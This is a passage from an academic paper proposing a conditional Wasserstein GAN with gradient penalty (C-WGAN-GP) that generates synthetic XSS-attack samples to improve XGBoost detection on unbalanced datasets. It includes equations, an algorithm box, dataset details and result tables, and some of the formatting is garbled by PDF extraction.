dataset, they achieved an estimated DR of 98.35%. However, the model is a deep neural network, which has potential high computational costs. Multiple studies (López et al., 2013; Haixiang et al., 2017) have thoroughly investigated the problem of unbalanced data. The problem can be mitigated at two levels: first, at the model level, by modifying existing algorithms to focus more on the minority class, such as embedding cost-sensitive methods with an ensemble learning algorithm, and second, at the data level, by preprocessing data before it is fed into the algorithm (López et al., 2013). The data-level approach uses either the undersampling or the oversampling method. Undersampling mitigates class imbalance by randomly removing some samples from the majority class in the training dataset. Conversely, oversampling mitigates the class imbalance by duplicating some minority class samples in the training dataset. However, these methods can result in the loss of important information and overfitting, respectively. Kovács et al. (2002) proposed the synthetic minority oversampling technique (SMOTE) as an oversampling method for the minority class. However, this method generates an equal number of synthetic samples for each real sample from the minority class without considering neighbor samples. Consequently, the overlap between class increases with the potential generation of noisy samples (Vluymans, 2019). Adaptive versions of SMOTE have been proposed, including borderline SMOTE and DBSMOTE. Borderline SMOTE (Han, Wang & Mao, 2002) concentrates synthetic samples along the borderline within classes. Cluster-based algorithm DBSMOTE (Bunkhumpornpat, Sinapiromsaran & Lursinsap, 2012) assembles data samples into clusters using DBSCAN clustering and adaptive synthetic sampling (He et al., 2008). However, these methods are based on local information instead of on the overall-minority class distribution (Douzas & Bacao, 2018). PROPOSAL AND EXPERIMENTAL METHODOLOGY This section presents the different generative networks, including GAN, CGAN, WGAN, and WGAN-GP, in addition to our proposed model. The model architecture, experimental methodology design, XGBoost attack detector, and datasets are also presented as follows. GANs GAN is recently introduced as a novel approach to train a generative model, which has achieved success in different fields, including images and natural language processing (Goodfellow et al., 2014). The network comprises two adversarial models: first, the generative model G for learning the distribution of data and, second, the discriminator D, which estimates the probability that a sample is from the real training data instead of G. Both models G and D in the network compete to outsmart the other where G and D can be a nonlinear mapping function, such as a multilayer perceptron. The generator G learns the distribution pg over data x and constructs a mapping function from noise space of uniform dimension pz(z) to data space as G(z,θg ). The discriminator D(x,θd) returns a single scalar to estimate the probability that an instance x came from the real data distribution rather than pg . Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 5/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 Both G and D are trained together, such that the parameters for G are adjusting to minimize log(1−D(G(z))) and parameters for D are adjusting to minimize logD(X), similarly to the two-player minimax game accompanied by value function V (G,D) as in Eq. (1). min G max D V (G,D)=Ex∼Pr [ logD(x) ] +E∼ x∼Pg [ log(1−D(G(z))) ] (1) A CGAN extends GAN by adding space y to both the G and D to control data generation. The additional space y could be supplied from real data (class label) or data from other sources (Mirza & Osindero, 2014). The training phase of both CGAN and GAN is similar, and the minimax objective function of D and G is as shown in Eq. (2). min G max D V (G,D)=Ex∼Pr [ logD ( x|y )] +E∼ x∼Pg [ log ( 1−D ( G ( z|y ) ,y ))] (2) where pr is the real data distribution and pg is the CGAN model distribution implicitly defined as x̃ = ( z,y ) ,z ∼p(z),y ∼p(y), where y and noise z are combined as input to the hidden layer. The CGAN and GAN use Jensen–Shannon (JS) divergence shown in Eq. (3) to measure generative samples. JS ( pr,pg ) =KL(pr||pm)+KL(pg||pm), { kl is ullback−Leibler divergence pm=(pr +pg )/2 (3) However, both GAN and CGAN have unstable training (vanishing gradients) and mode collapse problems (Pan et al., 2019). To overcome these problems, the WGAN optimizes the original GAN objective using Wasserstein-1 distance, also known as the earth-mover distance (EMD) instead of JS (Arjovsky, Chintala & Bottou, 2017), where EMD measures the distance between the actual distribution of the data and the distribution of the generative model as in Eq. (4). W ( pr,pg ) = inf γ ∈ ∏ (pr,pg ) E(x,y)∼γ [∣∣∣∣x−y∣∣∣∣] (4) where ∏ (pr,pg ) represents all possible joint distribution sets (x,y) of pr and pg of real and generated data distribution, respectively. Such that, for each feasible joint distribution γ , a real instance x and a generated instance y can be sampled, and the instance distance [||x−y||] is calculated. Therefore, the expected value γ E(x,y)∼γ[||x−y||] of the instance to the distance under the joint distribution γ can be calculated. The value function of WGAN was obtained by utilizing Kantorovich–Rubinstein duality (Villani, 2009), as shown in Eq. (5). min G max D∈F V (G,D)= E x∼pr [D(x)]− E ∼ x∼pg [ D ( ∼ x )] (5) where F is the set of 1-Lipschitz functions restricted by k, ∣∣F(x)−F(y)≤k∣∣x−y|, and pg i is the model distribution. The value function is minimized concerning G determined by x̃ =G(z),z ∼p(z). Therefore, the discriminator called a critic minimizes the W (pr,pg ). Nevertheless, the WGAN still faces gradient extinction or gradient explosion because of Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 6/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 weight clipping in the discriminator. The gradient penalty (GP) was added to the total loss function in the WGAN distance discriminator to achieve training stability (Gulrajani et al., 2017). The new objective value function is adjusted, as shown in Eq. (6). min G max D V (G,D)= E x∼pr [D(x)]− E ∼ x∼pg [ D ( ∼ x )] −λEx̂∼px̂ [ (∇x̂D(x̂)||2−1) 2] (6) where x̂ =εx+(1−ε),x̃ is a convex function combination of real data distribution pr(x) and the model data distribution pg(z), ε∼unform[0,1], whereas λ is the gradient penalty parameter. C-WGAN-GP model This study proposes using data augmentation based on a GAN that takes real samples as inputs and outputs adversarial samples. The learning algorithm of our proposed model is based on CGAN (Mirza & Osindero, 2014) and WGAN-GP (Gulrajani et al., 2017), where both networks are integrated. Precisely, we used the WGAN-GP optimization approach to optimize CGAN. The integrated generative network is called C-WGAN-GP. Our goal is to generate synthetic samples of attack class (minority) with identical distribution to real XSS attack scenarios. The primary idea is to use the learning of the joint probability distribution over x samples and y labels from the training data to perform data augmentation only if the generated sample x̃ satisfy the critic. The problem of unbalanced data can be mitigated by using an augmented data in the classification tasks, therefore improving the robustness and performance of the XSS attack detection for unbalanced data. A well-trained generator with joint distributions set (x,y) of pr and pg of real and generated data distribution optimized using GP should be able to generate (x̃,y) samples within the tolerated latent space and identical to the original data of (x,y), therefore providing valuable information to the detector as additional training data. To ensure that only useful instances are added to augment the training dataset, only generated cases that satisfy the critic are added to the original data. The y labels of the minority class, which are XSS attacks in our case, are used as a conditional parameter. Passing the upper and lower real data space to the generator provides the generator with additional auxiliary information to define the latent space. The latent space establishes the scope of samples in the data variance. Therefore, the generator using the auxiliary latent space generates samples within the tolerated latent space identical to the real data. Consequently, the discriminator distinguishes the synthetic samples as real within small feedback loops needed to train the generator, reducing computational cost while providing high-quality generated data. In the discriminator D, the pr and pg are linked with y in a joint hidden layer representation, whereas in generator G, the y is combined with p(z) in the same manner. The objective minimax function of models D and G is as shown in Eq. (7), whereas Eqs. (8) and (9) represent the loss reduction functions of D and G, respectively. min G max D∈F V (G,D)= E x∼pr [ D(x|y) ] − E ∼ x∼pg [ D ( ∼ x|y )] −λEx̂∼px̂ [ (∇x̂D ( x̂|y ) ||2−1) 2] (7) Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 7/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 min L(D)= E ∼ x∼pg [ D ( ∼ x|y )] − E x∼pr [ D ( x|y )] +λ.Ex̂∼px̂ [ (∇x̂D ( x̂|y ) ||2−1) 2] (8) min L(G)=− E ∼ x∼pg [ D ( ∼ x|y )] (9) Generative model design Generative networks have gained popularity in image data; however, we are interested in digital datasets. Therefore, the technique used is similar but differs in design and implementation. In our model, we did not apply convolutional layers. In the generator model G, the concatenate input layer equal to (z + c), where z is the vectors of noise set within the range of batch size and data dimension. The c is the conditioning variable’s dimension that equals 1. The model has three hidden layers of the neural network—the number of units in hidden layers equal to 128, 256, and 512, respectively. The output layer equal to z and the concatenate layer is equal to the input layer (z + c). In the discriminator (critic) D, the same architecture is used but in descending order of hidden layers, which equal to 512, 256, 128, respectively. The third layer is a linear activation function that equals to 1. The batch size and numbers of epochs for the network are 128 and 4000, respectively. The activation function used for the generator and discriminator is the rectified linear unit. The C-WGAN-GP is fitted using Adam optimizer with α, β1, and β2 parameters calibrated to le-4, 0.5, and 0.99, respectively. The alpha or (α) for short refers to the learning rate, while beta1 (β1) and beta2 (β2) refer to the exponential decay rate for the first-moment and second-moment estimates, respectively. The value of the GP coefficient λ for C-WGAN-GP is set to 10. The parameter k of D is tuned to 4, whereas k of G is tuned to 1. A conditional critic neural network is trained to approximate the EMD using the minority class for control mode up to 4000 training steps. Note that the parameters are defined empirically, whereas the performance reduces significantly by changing the parameters. The other different hyperparameters not mentioned are consistent with those originally reported. During the testing phase, the generated samples added to the real dataset are the samples approved by the critic. Algorithm 1 presents the generative approach for XSS attack data. Note that the other generator network architectures are similar, with negligible differences, which may be necessary for the implementation. Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 8/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 Box 1. The C-WGAN-GP algorithm. Algorithm 1: C-WGAN-GP Required: Batch size m =128, n-critic =4, penalty parameter =10 and Adam optimizer parameters (𝜆 )𝑙𝑟 = 0.0001,𝛽1 = 0.5, 𝛽2 = 0.99 1: for ►𝑖𝑛𝑡𝑖𝑚𝑎𝑙 𝑣𝑎𝑙𝑖𝑢𝑚𝑠 𝑐𝑟𝑖𝑡𝑖𝑐 𝑎𝑛𝑑 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑜𝑟: 2: 𝑠𝑒𝑡 𝜃𝑐 = 0 , 𝜃𝑔 = 0 3: 𝑤ℎ𝑖𝑙𝑒 𝜃 ℎ𝑎𝑠 𝑛𝑜𝑡 𝑐𝑜𝑛𝑣𝑒𝑟𝑔𝑒𝑑 𝑑𝑜 6: ►𝐸𝑥𝑒𝑐𝑢𝑡𝑒 𝑛 𝑐𝑟𝑖𝑡𝑖𝑐 𝑡𝑟𝑎𝑖𝑛𝑖𝑛𝑔 𝑠𝑡𝑒𝑝𝑠 𝑓𝑜𝑟 𝑑𝑖𝑠𝑐𝑟𝑖𝑚𝑖𝑛𝑎𝑡𝑜𝑟 (𝑐𝑟𝑖𝑡𝑖𝑐 ) 7: 𝑓𝑜𝑟 𝑡 = 1,…, 𝑛_𝑐𝑟𝑖𝑡𝑖𝑐 𝑑𝑜 8: 𝑓𝑜𝑟 𝑖 = 1,…, 𝑚 𝑑𝑜 9: 𝑆𝑎𝑚𝑝𝑙𝑒 {(𝑥𝑖,𝑦𝑖)} 𝑚𝑖 = 1~Ɗ 𝑎 𝑏𝑎𝑡𝑐ℎ 𝑜𝑓 𝑠𝑖𝑧𝑒 𝑚 𝑜𝑓 𝑟𝑒𝑎𝑙 𝑑𝑎𝑡𝑎 𝑤𝑖𝑡ℎ 𝑐𝑜𝑟𝑟𝑒𝑠𝑝𝑜𝑛𝑑𝑖𝑛𝑔 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 10: 𝑆𝑎𝑚𝑝𝑙𝑖𝑛𝑔 𝑛𝑜𝑖𝑠𝑒 {(𝑧𝑖)} 𝑚𝑖 = 1~𝑝𝑧(𝑧), 𝑎 𝑟𝑎𝑛𝑑𝑜𝑚 𝑛𝑢𝑚𝑏𝑒𝑟 𝜀~ 𝕌[0,1] 11: ►𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒 𝑎 𝑓𝑎𝑘𝑒 𝑠𝑎𝑚𝑝𝑙𝑒𝑠 𝑋𝑖 𝑐𝑜𝑟𝑟𝑒𝑠𝑝𝑜𝑛𝑑𝑖𝑛𝑔 𝑡𝑜 𝑚𝑖 𝑟𝑒𝑎𝑙 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 12: 𝑋𝑖←𝐺(𝑧𝑖|𝑦𝑖,𝜃𝑔) 13: ►𝐶𝑜𝑚𝑝𝑢𝑡 𝑝𝑒𝑛𝑎𝑙𝑡𝑟𝑦 𝐺𝑝 𝑎𝑛𝑑 𝑙𝑜𝑠𝑠 𝑓𝑜𝑟 𝑐𝑟𝑖𝑡𝑖𝑐 14: 𝑥𝑖←𝜀𝑥𝑖 + (1 ‒ 𝜀)𝑥𝑖 15: 𝐺𝑝(𝜃𝑐)← 1𝑚∑𝑚𝑖 = 1[𝑚𝑎𝑥(‖∇𝑥 �ℱ(𝑥𝑖|𝑦𝑖,𝜃𝑐)||2 ‒ 1)2] 15: 𝔼(𝜃𝑐)←∇𝜃𝑐[ 1𝑚∑𝑚𝑖 = 1ℱ(𝑥𝑖|𝑦𝑖,𝜃𝑐) ‒ 1𝑚∑𝑚𝑖 = 1ℱ(𝑥𝑖|𝑦𝑖,𝜃𝑐)] + 𝜆.𝐺𝑝(𝜃𝑐) 16: 𝑒𝑛𝑑𝑓𝑜𝑟 17: 𝜃𝑐←𝐴𝑑𝑎𝑚(𝔼𝜃𝑐,𝜃𝑐,𝛼,𝛽1,𝛽2) 18: 𝑒𝑛𝑑𝑓𝑜𝑟 19: ►𝐸𝑥𝑒𝑐𝑢𝑡𝑒 𝑎 𝑠𝑖𝑛𝑔𝑙𝑒 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑜𝑟 𝐺 𝑡𝑟𝑎𝑖𝑛𝑖𝑛𝑔 𝑠𝑡𝑒𝑝 20: 𝑆𝑎𝑚𝑝𝑙𝑖𝑛𝑔 {𝑦𝑖} 𝑚𝑖 = 1~Ɗ 𝑎 𝑏𝑎𝑡𝑐ℎ 𝑜𝑓 𝑠𝑖𝑧𝑒 𝑚 𝑜𝑓 𝑟𝑒𝑎𝑙 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 21: 𝑆𝑎𝑚𝑝𝑙𝑖𝑛𝑔 𝑛𝑜𝑖𝑠𝑒 {𝑧𝑖} 𝑚𝑖 = 1~𝑝𝑧(𝑧) 22: ►𝐶𝑜𝑚𝑝𝑢𝑡𝑒 𝑔𝑟𝑎𝑑𝑖𝑒𝑛𝑡 𝑤𝑖𝑡ℎ 𝑟𝑒𝑠𝑝𝑒𝑐𝑡 𝑡𝑜 𝑡ℎ𝑒 𝐺 𝑝𝑎𝑟𝑎𝑚𝑒𝑡𝑒𝑟𝑠 23: 𝔼(𝜃𝑔)←∇𝜃𝑔[ 1𝑚∑𝑚𝑖 = 1ℱ(𝑔(𝑧𝑖|𝑦𝑖,𝜃𝑔)|𝑦𝑖,𝜃𝑐) 24: 𝜃𝑔←𝐴𝑑𝑎𝑚( ‒ 𝔼𝜃𝑔,𝜃𝑐,𝛼,𝛽1,𝛽2) 25: 𝑒𝑛𝑑 𝑤ℎ𝑖𝑙𝑒 26: 𝑙𝑜𝑎𝑑 𝑡ℎ𝑒 𝑏𝑒𝑠𝑡 𝑠𝑡𝑒𝑝 𝑤𝑒𝑖𝑔ℎ𝑡 𝑓𝑜𝑟 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑖𝑣𝑒 𝑛𝑒𝑡 27: 𝑑𝑎𝑡𝑎_ 𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒𝑑 [ ] 28: 𝑤ℎ𝑖𝑙𝑒 𝜃 ℎ𝑎𝑠 𝑐𝑜𝑛𝑣𝑒𝑟𝑔𝑒𝑑 𝑑𝑜 29 ►𝑔𝑒𝑛𝑒𝑟𝑎𝑡 𝑋𝑖 𝑠𝑎𝑚𝑝𝑙𝑒𝑠 30: for each 𝑠𝑎𝑚𝑝𝑙𝑒 𝑋𝑖 𝑐𝑜𝑟𝑟𝑒𝑠𝑝𝑜𝑛𝑑𝑖𝑛𝑔 𝑡𝑜 𝑟𝑒𝑎𝑙 𝑙𝑎𝑏𝑒𝑙 𝑦𝑖 𝑑𝑜 31: 𝑖𝑓 𝑋𝑖 𝑠𝑎𝑡𝑖𝑠𝑓𝑦 𝑡ℎ𝑒 𝑐𝑟𝑖𝑡𝑖𝑐 𝑡ℎ𝑒𝑛 32: 𝑑𝑎𝑡𝑎_𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒𝑑.𝑎𝑝𝑝𝑒𝑛𝑑 [𝑋𝑖] 33: 𝑒𝑛𝑑 𝑓𝑜𝑟 34: 𝑒𝑛𝑑 𝑤ℎ𝑖𝑙𝑒 35: 𝐽𝑜𝑖𝑛 𝑑𝑎𝑡𝑎_𝑔𝑒𝑛𝑒𝑟𝑎𝑡𝑒𝑑 𝑋𝑖 𝑡𝑜 𝑡ℎ𝑒 𝑑𝑎𝑡𝑎𝑠𝑒𝑡 𝑥𝑖 36: 𝑡𝑟𝑒𝑎𝑡𝑖𝑛𝑔 𝑎 𝑛𝑒𝑤 𝑋𝐺𝐵𝑜𝑜𝑠𝑡 𝑚𝑜𝑑𝑒𝑙 1 PeerJ Comput. Sci. reviewing PDF | (CS-2020:08:51806:1:1:NEW 10 Oct 2020) Manuscript to be reviewedComputer Science Experimental methodology This study proposed generative model C-WGAN-GP, an oversampling solution of minority class to solve unbalanced XSS attack data. We trained the detector (XGBoost) using the real training dataset and test it using the test dataset before without augmented data, and then the results were recorded for comparison. Subsequently, we trained each of the GANs models using real training dataset to generate synthetic data. We repeated the training of the detector using the augmented data and test it using the test dataset. The results of each model were recorded for comparison. Similarly, traditional oversampling methods were trained and tested. The C-WGAN-GP generator performance was evaluated in two directions. First, we assessed the performance of the C-WGAN-GP generative adversarial network against the Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 9/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 other four GANs. Second, we compared our C-WGAN-GP model with two traditional oversampling methods include SMOTE (Han, Wang & Mao, 2002) and adaptive synthetic (ADASYN) (Bunkhumpornpat, Sinapiromsaran & Lursinsap, 2012). The systemic flowchart of the proposal is shown in Fig. 1. Detector We use an external model to evaluate the quality of the data generated by our proposed method and other methods. The XGBoost boosting model was used for all experiments to assess the augmented data’s quality on XSS attack detection performance. The XGBoost is a state-of-the-art boosting algorithm that is simple to apply and interpret, is highly efficient, does not require advanced data preparation, and has many advanced functions (Chen & Guestrin, 2016). The algorithm’s learning rate, tree size, and tree number hyperparameters tuned to 0.3, 4, and 100, respectively. Datasets To our knowledge, there is only one public dataset for intrusion detection that includes XSS attacks that we were able to find called CICIDS2017 designed by the Canadian Institute of Cybersecurity (Sharafaldin, HabibiLashkari & Ghorbani, 2018). The released CICIDS2017 dataset contains 80 features that include regular traffic and recent common attacks. To provide attack features, we used a CICFlowMeter tool to extract features from PCAPs files and used Selenium with Damn Vulnerable Web Application to run automatic XSS attacks. However, there are only 652 XSS attacks traffic, and over 140,008 regular traffic, making it a highly unbalanced dataset. We have added another dataset proposed in our previous work (Mokbal et al., 2019). The dataset includes 67 features with labels that are categorized based on three groups, including HTML, JavaScript, and URL. We extracted 1,000 XSS attack samples and 100,000 benign samples as a second dataset. We applied data preprocessing to each dataset. In both datasets, all samples have two classes, XSS attack and benign, which are set to [1, 0], respectively. The two datasets were split randomly into training and test sets with a 70% and 30% ratio, respectively, where data augmentation was performed only on the training dataset. Missing and infinite values in CICIDS2017 were updated using their features’ mean values, whereas the zero features and duplicate rows were omitted. The number of features with clean data in the CICIDS2017 dataset is 78, and the number of features with clean data in the second dataset is 67. Subsequently, the data’s scale within the range [0, 1] was applied using the minimax function for both datasets. The class-level distribution of datasets is shown in Table 1. The datasets are available at https://doi.org/10.6084/m9.figshare.13046138.v4. Performance evaluation criteria Although many performance metrics have been introduced, GANs do not have an objective measure of the generator model, as there is no consensus on the best metric that captures the strength/limitations of the model and should be used for a fair comparison between models (Borji, 2019). We used precision, detectionRate(DR)/ recall, and F1−score, which are proven and widely adopted methods for quantitatively estimating the quality of discriminative Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 10/20 https://peerj.com https://doi.org/10.6084/m9.figshare.13046138.v4 http://dx.doi.org/10.7717/peerj-cs.328 Unbalanced dataset Testing data Training data Min Max scaling Preprocessing Classifier training Augmented data Result Benign Attack 10-Fold Cross validation (cv) Append the sample generated Jointed real and generated data Critic (D) Generator (G) Accepted No Yes Fine-tuning training A tt a ck c la ss N o is e R e a l tr a in in g d a ta C-WGAN-GP XGBoost Figure 1 Systemic flowchart of C-WGAN-GP. Full-size DOI: 10.7717/peerjcs.328/fig-1 Table 1 The class-level distribution of the datasets. ID Dataset #Samples #Attributes Minority class Majority class #Minority samples #Majority samples 1 CICIDS2017 (Sharafaldin, HabibiLashkari & Ghorbani, 2018) 140,660 77 Attack Benign 652 140,008 2 MLPXSS (Mokbal et al., 2019) 101,000 67 Attack Benign 1000 100,000 models suggested by Google Brain research (Lucic et al., 2018). Precision measures the generated instances similarity to the real ones on average. Whenever the instances generated are similar to the real instances, the precision is high. In GANs, the recall (detection rate) measures diversity. A high recall indicates the generator can generate any instances found in the training dataset. For cybersecurity detection sys, the recall/detection rate denotes the ability of sys to detect the real attacks. The F-score reflects the harmonic mean of precision and recall. Further, the area under the curve (AUC) measure that demonstrates a detector’s ability to distinguish between classes and summarizes the detector’s performance is also collected. The measurements are defined as follows. Precision= TP (TP+FP) (10) DR= TP (TP+FN) (11) Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 11/20 https://peerj.com https://doi.org/10.7717/peerjcs.328/fig-1 http://dx.doi.org/10.7717/peerj-cs.328 F−Score=2 ( (Recall×Precision) (Recall+Precision) ) (12) AUC = 1 2 ( TP TP+FN + TN TN +FP ) (13) RESULTS AND DISCUSSION The C-WGAN-GP-based data augmentation approach was implemented in Python 3.7 using the TensorFlow framework on Linux operating system. The proposed method was implemented alongside four other GAN-based generative methods and two traditional generative methods (SMOTE and ADASYN). All the methods were validated using 10-fold cross-validation. To demonstrate how the attack DR decreased as the gap between normal and malicious classes increased, we injected different ratios of the majority class in the training data to train the XGBoost detector model using AUC and DR criteria. The model tested on the fixed test dataset size of 30% each time. During the attack detection test, the results show that DR decreased from 96.59% with an injected ratio of 2% of the majority class to approximately 91.00% with an injected ratio of 100% of the majority class. These results are shown in Table 2. Using our generative approach, we injected the generated data into a real training dataset to create a new augmented training dataset. The augmented data were used to train the XSS attack detector, which is different from the generative framework to judge the data quality. The detector was tested using the real test dataset. This experiment mechanism was applied to all of the methods we used, and results were reported for each scenario. The average results reported in each trial on the CICIDS2017 dataset are shown in Table 3 (Sharafaldin, HabibiLashkari & Ghorbani, 2018). Using the same mechanism, we repeated the experiments using the dataset extracted from our previous work (Mokbal et al., 2019), and the results are shown in Table 4. Notably, using augmented data generated by the proposed method significantly improved the XSS attacks detection compared with state-of-the-art baseline methods. The results in Tables 3 and 4 show that the DR increased up to 98.95% in the CICIDS2017 dataset and up to 96.67% in the second dataset. That is, our generative model able to generate any sample found in the XSS attack training dataset. The precision measure is also high, which equals 0.99333 on the first dataset and 0.989761 on the second dataset. The precision results imply that the proposed generative model generated samples look similar to the real XSS attack samples on average. Concerning F-Score, the proposed generative model was superior to other generative methods. It achieved the result score of 0.990382 in the first data set and the score of 0.978078 in the second dataset. The AUC measure of the proposed generative model is also continued to be outperformed the other methods in both datasets with a significant margin. Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 12/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 Table 2 The collapse of the detection rate as the unbalanced classes’ gap increased. Ratio Train-auc mean Train-auc std Train-recall mean Train-recall std Test-auc mean Test-auc std Test-recall mean Test-recall std 2% 0.998624 0.000345 0.976264 0.004189 0.995596 0.004673 0.965895 0.008869 5% 0.997947 0.001006 0.966985 0.003804 0.994683 0.001888 0.954185 0.007851 14% 0.991259 0.004218 0.946233 0.003984 0.985622 0.009439 0.937748 0.023061 40% 0.966395 0.002146 0.927482 0.003458 0.965025 0.010199 0.922232 0.022333 100% 0.965471 0.001782 0.923503 0.005247 0.965422 0.007108 0.910094 0.011817 Table 3 Detection results using data augmented generated through different methods on the CICIDS2017 dataset. Criteria None ADASYN SMOTE GAN CGAN WGAN WGAN-GP C-WGAN-GP DR (sensitivity) 0.883333 0.98667 0.96000 0.92667 0.96333 0.97333 0.97833 0.987452 Specificity 0.929967 0.99983 0.99980 0.99993 0.99993 0.99987 0.99996 0.99993 Precision 0.90513 0.98339 0.97959 0.99286 0.99313 0.98649 0.98949 0.99333 F-score 0.894099 0.98502 0.96970 0.95862 0.97800 0.97987 0.983878 0.990382 AUC 0.917548 0.99325 0.97990 0.9633 0.98163 0.9866 0.989148 0.993691 Table 4 Detection results using data augmented generated through different methods on the second dataset. Criteria None ADASYN SMOTE GAN CGAN WGAN WGAN-GP C-WGAN-GP DR (sensitivity) 0.873333 0.956667 0.943343 0.932983 0.933333 0.94667 0.951211 0.966667 Specificity 0.979967 0.999833 0.999933 0.989867 0.999867 0.99973 0.999933 0.9999 Precision 0.956198 0.982877 0.992982 0.985915 0.985915 0.97260 0.977864 0.989761 F-score 0.912889 0.969595 0.967527 0.958719 0.958904 0.95945 0.964353 0.978078 AUC 0.92665 0.97825 0.970138 0.961425 0.9666 0.9732 0.975572 0.983283 The results for ADASYN, WGAN-GP, WGAN, SMOTE, and CGAN showed improved DR performance, respectively, with varying proportions. The effects of the additional samples on the XSS attack DR under the condition of acceptance by the discriminator on the CICIDS2017 dataset are shown in Fig. 2 along with standard deviation. The standard deviation of the C-WGAN-GP is overall small compared to other methods; it also decreases as training steps increase. While the standard deviation of CGAN and WGAN is not smooth and shows more variation. The standard deviation of WGAN-GP was smoother than GAN and WGAN but less smooth and more varied than C-WGAN-GP. This fact indicates the stability of C-WGAN-GP training to some extent. The results suggest that the C-WGAN-GP significantly outperformed CGAN, WGAN and WGAN-GP. The superiority of the C-WGAN-GP over the rest of the GANs is due to the fact that the model is enhanced with the characteristics of two generative networks, CGAN and WGAN- GP. The C-WGAN-GP used minority class labels that act as an extension to the latent space z to generate and discriminate instances well, which inspired from CGAN. Consequently, the model can learn a multi-modes mapping from inputs to outputs by feeding it with different contextual auxiliary information. The C-WGAN-GP optimized using Wasserstein distance with gradient penalty inspired by WGAN-GP. The training process is more stable Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 13/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.328 Figure 2 Effects of the data augmentation on the XSS attack detection rate over the baseline for GAN, WGAN, WGAN-GP, and C-WGAN-GP. (A) CGAN detection rate, (B) WGAN detection rate, (C) WGAN-GP detection rate, and (D) C-WGAN-GP detection rate. The red horizontal dashed line indicates the baseline estimate of each generative model. Full-size DOI: 10.7717/peerjcs.328/fig-2 and less sensitive to model design and configurations of hyperparameter. Further, the loss of the critic is related to the quality of instances created by the generator. Precisely, the lower the critic’s loss when evaluating the instances generated, the higher the expected quality of the instances generated. This criterion is crucial because unlike other GANs that seek stability by finding a balance between two models, WGAN seeks convergence and minimizes generator loss. Furthermore, adding the generated samples of CGAN, WGAN, and WGAN-GP that satisfied the discriminator’s acceptance condition (critic) adds value to the augmented training dataset, which increases detector ability and efficiency. The loss of generated data for C-WGAN-GP compared with that of the other four GAN methods is shown in Fig. 3. It is quite clear that the loss curve of C-WGAN-GP decreased regularly and continuously compared to all other generative methods. The loss curves of GAN and CGAN are unstable, and the models went to collapse mode during the generating phase. The WGAN and WGAN–GP loss curves decreased regularly; however, it is high compared with C-WGAN-GP. Note that GAN and CGAN are using JS divergence, whereas WGAN and C-WAN-GP are using the Wasserstein distance or EMD. Similarly, in the loss curve of real data, the GAN and CGAN face difficulty learning the training data distribution. In contrast, the WGAN and WGAN–GP losses decreased regularly; however, it is high compared with C-WGAN-GP. The C-WGAN-GP seems to learn the training data distribution better than all other generative methods, as shown in Fig. 4. To estimate the proposed method’s generalization ability, we investigated the Wasserstein critic, in which the distance between actual and generated data losses is calculated. This estimate demonstrates how much the data generated by the proposed model and real data are identical. The difference in distance between the real and generated data distribution of WGAN, WGAN-GP, and C-WGAN-GP that generative models learn to minimize is shown in Fig. 5. The distance between generated and real data of C-WGAN-GP is close to zero. That is, The C-WGAN-GP generated samples that are identical to real data distribution; further, the training stability of the proposed generative model is adequate. For further clarification, the XGBoost classification accuracy trained on the five different generative methods’ data is shown in Fig. 6. The XGBoost accuracy curve of C-WGAN-GP data is higher than that of other models, which indicates the quality of the data generated Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 14/20 https://peerj.com https://doi.org/10.7717/peerjcs.328/fig-2 http://dx.doi.org/10.7717/peerj-cs.328 0 500 1000 1500 2000 2500 3000 3500 4000 Training step 0.1 0.2 0.3 0.4 0.5 0.6 G en er at ed L os se s GAN CGAN WGAN WGAN_GP C_WGAN_GP Figure 3 The loss of generated data. Full-size DOI: 10.7717/peerjcs.328/fig-3 0 500 1000 1500 2000 2500 3000 3500 4000 Training step 0.0 0.1 0.2 0.3 0.4 0.5 0.6 0.7 R ea l L os se s GAN CGAN WGAN WGAN_GP C_WGAN_GP Figure 4 The loss of real data. Full-size DOI: 10.7717/peerjcs.328/fig-4 by the proposed model. Figure 7 shows a general visualization example of the data quality generated by C-WGAN-GP compared with other generative methods and displays the collapse mode of GAN and CGAN between 2500 and 4000 of training steps in the second dataset. In addition to the beginning of the gradient extinction of WGAN at 4000 of training steps. CONCLUSIONS This study proposed a conditional critic neural network with a gradient penalty called C- WGAN-GP to improve the XSS attack detection on unbalanced datasets. The C-WGAN-GP Mokbal et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.328 15/20 https://peerj.com https://doi.org/10.7717/peerjcs.328/fig-3 https://doi.org/10.7717/peerjcs.328/fig-4 http://dx.doi.org/10.7717/peerj-cs.328 0 500 1000 1500 2000 2500 3000 3500 4000 Training step 0.01 0.02 0.03 0.04 G en er at ed - A ct ua l C rit ic L os s WGAN WGAN_GP C_WGAN_GP Figure 5 Difference between critic (EM distance estimate) loss on generated and real samples. Full-size DOI: 10.7717/peerjcs.328/fig-5 500 1000 1500 2000 2500 3000 3500 4000 Training step 0.99775 0.99800 0.99825 0.99850 0.99875 0.99900 0.99925 X G B bo os t a cc ur ac y GAN CGAN WGAN WGAN_GP C_WGAN_GP 